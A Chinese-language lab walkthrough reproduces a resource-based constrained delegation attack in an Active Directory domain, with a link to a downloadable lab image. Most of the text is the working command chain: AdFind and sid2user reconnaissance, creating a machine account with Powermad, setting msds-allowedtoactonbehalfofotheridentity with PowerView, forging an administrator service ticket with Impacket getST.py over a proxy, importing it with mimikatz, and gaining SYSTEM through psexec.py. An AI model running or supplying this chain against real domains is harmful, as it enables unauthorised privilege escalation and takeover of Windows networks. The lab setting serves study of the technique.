利用条件

首先是dc域控主机必须是win2012以上的主机

其次是域内有一个账户，可以同时登录两台主机

利用  jie 可以登录  win2008  也可以登录  win7

资源委派不需要设置委派，默认即可

实验复现

复现环境

通过网盘分享的文件：136-xiaodi.local内网域环境镜像文件
链接: https://pan.baidu.com/s/1H3ypkEoTiJMbwfMxJ7JMCA?pwd=wnra 提取码: wnra

这里在本地复现，cs中操作时一致的

使用adfind工具查询域内是否有SID一致的主机，并获取主机名

AdFind.exe -h DC的ip -b "DC=域,DC=控" -f "objectClass=computer" mS-DS-CreatorSID
AdFind.exe -h 192.168.3.33 -b "DC=xiaodi,DC=local" -f "objectClass=computer" mS-DS-CreatorSID

 要利用资源委派就得知道这个用户是谁，根据这个sid，利用工具sid2user.exe去查询用户名，需要删除sid的s-1以及后面的所有横杠

sid2user.exe \\192.168.3.33 5 21 1695257952 3088263962 2055235443 1104

 

那么如果你拿到的就是dbadmin用户，就可以利用该账户从web渗透到dc，没拿到就得想办法去获取这个用户

利用这个工具去执行下面的攻击

https://gitcode.com/gh_mirrors/po/Powermad/overview?utm_source=csdn_github_accelerator&isLogin=1

添加机器

Set-ExecutionPolicy Bypass -Scope Process   ##设置允许执行脚本
import-module .\Powermad.ps1             ##导入模块
New-MachineAccount -MachineAccount test1 -Password $(ConvertTo-SecureString "123456" -AsPlainText -Force) ##创建一个用户为test1的，然后密码是123456

执行完成以后域控内有一个test1主机

获取新主机的sid值

Set-ExecutionPolicy Bypass -Scope Process 
Import-Module .\PowerView.ps1
Get-NetComputer test1 -Properties objectsid

 修改目标主机的属性

Set-ExecutionPolicy Bypass -Scope Process
import-module .\powerview.ps1
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1695257952-3088263962-2055235443-1602)"   ##(刚才获得的sid值)
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer DATA| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose  ##（DATA是攻击的目标主机）

检验是否配置成功

Get-DomainComputer DATA -Properties msds-allowedtoactonbehalfofotheridentity 

 

这个时候就可以生成票据去执行后续操作了，由于需要用到python程序，所以这里我还是用cs上线生成sockets代理

利用impack套件里面的getst.py获得票据，这里生成票据的时候不管你是再本地还是在代理都要记得设置hosts文件，否则无效

proxychains4 python getST.py -dc-ip 192.168.3.33 xiaodi.local/test1\$:123456 -spn cifs/data.xiaodi.local -impersonate administrator

生成了一个票据，上传到服务器，利用mimikatz导入票据

mimikatz kerberos::ptc administrator.ccache

再访问

提升权限

python psexec.py -k xiaodi.local/administrator@data.xiaodi.local -no-pass   ##可提升为system权限。